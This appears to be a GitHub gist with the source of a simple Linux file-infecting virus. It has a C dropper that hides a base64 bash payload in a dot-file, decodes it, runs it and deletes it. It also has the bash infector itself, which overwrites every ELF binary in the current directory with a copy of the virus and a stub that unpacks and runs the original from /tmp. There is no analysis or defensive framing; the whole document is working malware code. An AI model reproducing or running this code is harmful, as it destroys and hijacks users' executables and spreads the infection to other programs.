| #include <stdlib.h> | |
| #include <stdio.h> | |
| char payload[]="IyEvYmluL2Jhc2gKRD0wCkVOQz0iYmFzZTY0IC13IDAiCkRFQz0iYmFzZTY0IC1kIgoKZnVuY3Rpb24gZGJnICgpCnsKCWlmIFsgJEQgLWd0IDAgXTsgdGhlbgoJCWVjaG8gIltERUJVR10gJDI6ICIkMSAxPiYyCglmaQp9CgpmdW5jdGlvbiByYW5kb20gKCkKewoJaWYgWyAteiAiJDEiIF07IHRoZW4KCQlsZW49MTYKCWVsc2UKCQlsZW49JDEKCWZpCglfdD0kKGRkIGlmPS9kZXYvdXJhbmRvbSBvZj0vZGV2L3N0ZG91dCBicz0kbGVuIGNvdW50PTEgMj4vZGV2L251bGx8YmFzZTY0fHNlZCAicy9bXC9cK10vMC9nIikKCWVjaG8gJHtfdDowOiRsZW59Cn0KCgpmdW5jdGlvbiBnZXRfcGVybSAoKQp7CglpZiBbIC16ICIkMSIgXTsgdGhlbgoJCWRiZyAiTm8gZmlsZSBwYXRoIGdpdmVuIiAiZ2V0X3Blcm0iCgkJZWNobyAwCgllbHNlCgkJZWNobyAkKHN0YXQgLWMgIiVhIiAiJDEiIDI+JjEpCglmaQp9CgpmdW5jdGlvbiBzZXRfcGVybSgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXSB8fCBbIC16ICIkMiIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggb3Igbm8gcGVybSBnaXZlbiIgInNldF9wZXJtIgoJCWVjaG8gMgogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICQoY2htb2QgJDEgIiQyIiAyPi9kZXYvbnVsbCkKICAgICAgICBmaQp9CgoKZnVuY3Rpb24gZ2V0X3VnICgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggZ2l2ZW4iICJnZXRfcGVybSIKICAgICAgICAgICAgICAgIGVjaG8gMAogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgIGVjaG8gJChzdGF0IC1jICIlVTolRyIgIiQxIiAyPiYxKQogICAgICAgIGZpCQp9CgpmdW5jdGlvbiBlbmNfYmluYXJ5ICgpCnsKCWlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBnaXZlbiIgImVuY19iaW5hcnkiCiAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgZWNobyAkKGNhdCAiJDEiIHwkRU5DIDI+JjEpCiAgICAgICAgZmkKfQoKZnVuY3Rpb24gZGVjX2JpbmFyeSgpCnsKCWlmIFsgLXogIiQxIiBdIHx8IFsgLXogIiQyIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBvciBlbmNvZGVkIHBhcmFtIGdpdmVuIiAiZGVjX2JpbmFyeSIKICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBlY2hvICQyfCAkREVDIDI+L2Rldi9udWxsID4gIiQxIgogICAgICAgIGZpCn0KCmZ1bmN0aW9uIHNjYW5uZXIoKQp7CQoJcHRoPSQxCglmb3IgZiBpbiAkcHRoLyo7IGRvCgkJZGJnICJmb3VuZCAkZiIgc2Nhbm5lcgoJCWlmIFsgISAteiAkKGZpbGUgIiRmIiB8Z3JlcCAtb0UgRUxGKSBdICYmICEgW1sgIiRmIiA9PSAiLi92aXJ1cyIgXV07IHRoZW4KCQkJZGJnICJpbmZlY3RpbmcgJGYiIHNjYW5uZXIKCQkJX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCV9wZXJtPSQoZ2V0X3Blcm0gIiRmIikKCQkJX3VnPSQoZ2V0X3VnICIkZiIpCgkJCWRiZyAicGVybSAkX3Blcm0sIHVnICRfdWciIHNjYW5uZXIKCQkJaGVhZCAiJDAiIC1uMTAzID4gIiRmIgoJCQlfdGQ9Ii90bXAvc3NoLSIkKHJhbmRvbSAxMCkKCQkJZWNobyAibWtkaXIgJF90ZCAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJkZWNfYmluYXJ5IFwiJF90ZC8iJChiYXNlbmFtZSAiJGYiKSJcIiAkX3QiID4+ICIkZiIKCQkJZWNobyAiY2hvd24gJF91ZyBcIiRfdGQvJGZcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJjaG1vZCAkX3Blcm0gXCIkX3RkLyRmXCIgMj4vZGV2L251bGwiID4+ICIkZiIKCQkJZWNobyAiXCIkX3RkLyRmXCIgXCRAIiA+PiAiJGYiCgkJCWVjaG8gInJtIC1yZiBcIiRfdGRcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQkjX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCSNlY2hvICJlY2hvICRfdHwgJERFQyB8YmFzaCIgPiAiJGYiCgkJCWNob3duICRfdWcgIiRmIiAyPi9kZXYvbnVsbAoJCQljaG1vZCAkX3Blcm0gIiRmIiAyPi9kZXYvbnVsbAoJCWZpCglkb25lCQp9CgpzY2FubmVyIC4gMj4vZGV2L251bGwKZWNobyBIZWxsbyEgSSBhbSBhIHNpbXBsZSB2aXJ1cyEKCg=="; | |
| void main(){ | |
| char cmd[3000]="/bin/bash"; | |
| FILE *f = fopen(".vimcr", "w"); | |
| if(f==NULL){exit(1);} | |
| fprintf(f, payload); | |
| fclose(f); | |
| system("cat .vimcr| base64 -d > .screencr && /bin/bash .screencr"); | |
| unlink(".vimcr"); | |
| unlink(".screencr"); | |
| } |
| #!/bin/bash | |
| D=0 | |
| ENC="base64 -w 0" | |
| DEC="base64 -d" | |
| function dbg () | |
| { | |
| if [ $D -gt 0 ]; then | |
| echo "[DEBUG] $2: "$1 1>&2 | |
| fi | |
| } | |
| function random () | |
| { | |
| if [ -z "$1" ]; then | |
| len=16 | |
| else | |
| len=$1 | |
| fi | |
| _t=$(dd if=/dev/urandom of=/dev/stdout bs=$len count=1 2>/dev/null|base64|sed "s/[\/\+]/0/g") | |
| echo ${_t:0:$len} | |
| } | |
| function get_perm () | |
| { | |
| if [ -z "$1" ]; then | |
| dbg "No file path given" "get_perm" | |
| echo 0 | |
| else | |
| echo $(stat -c "%a" "$1" 2>&1) | |
| fi | |
| } | |
| function set_perm() | |
| { | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| dbg "No file path or no perm given" "set_perm" | |
| echo 2 | |
| else | |
| $(chmod $1 "$2" 2>/dev/null) | |
| fi | |
| } | |
| function get_ug () | |
| { | |
| if [ -z "$1" ]; then | |
| dbg "No file path given" "get_perm" | |
| echo 0 | |
| else | |
| echo $(stat -c "%U:%G" "$1" 2>&1) | |
| fi | |
| } | |
| function enc_binary () | |
| { | |
| if [ -z "$1" ]; then | |
| dbg "No file path given" "enc_binary" | |
| else | |
| echo $(cat "$1" |$ENC 2>&1) | |
| fi | |
| } | |
| function dec_binary() | |
| { | |
| if [ -z "$1" ] || [ -z "$2" ]; then | |
| dbg "No file path or encoded param given" "dec_binary" | |
| else | |
| echo $2| $DEC 2>/dev/null > "$1" | |
| fi | |
| } | |
| function scanner() | |
| { | |
| pth=$1 | |
| for f in $pth/*; do | |
| dbg "found $f" scanner | |
| if [ ! -z $(file "$f" |grep -oE ELF) ] && ! [[ "$f" == "./virus" ]]; then | |
| dbg "infecting $f" scanner | |
| _t=$(enc_binary "$f") | |
| _perm=$(get_perm "$f") | |
| _ug=$(get_ug "$f") | |
| dbg "perm $_perm, ug $_ug" scanner | |
| head "$0" -n103 > "$f" | |
| _td="/tmp/ssh-"$(random 10) | |
| echo "mkdir $_td 2>/dev/null" >> "$f" | |
| echo "dec_binary \"$_td/"$(basename "$f")"\" $_t" >> "$f" | |
| echo "chown $_ug \"$_td/$f\" 2>/dev/null" >> "$f" | |
| echo "chmod $_perm \"$_td/$f\" 2>/dev/null" >> "$f" | |
| echo "\"$_td/$f\" \$@" >> "$f" | |
| echo "rm -rf \"$_td\" 2>/dev/null" >> "$f" | |
| #_t=$(enc_binary "$f") | |
| #echo "echo $_t| $DEC |bash" > "$f" | |
| chown $_ug "$f" 2>/dev/null | |
| chmod $_perm "$f" 2>/dev/null | |
| fi | |
| done | |
| } | |
| scanner . 2>/dev/null | |
| echo You're doomed! |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment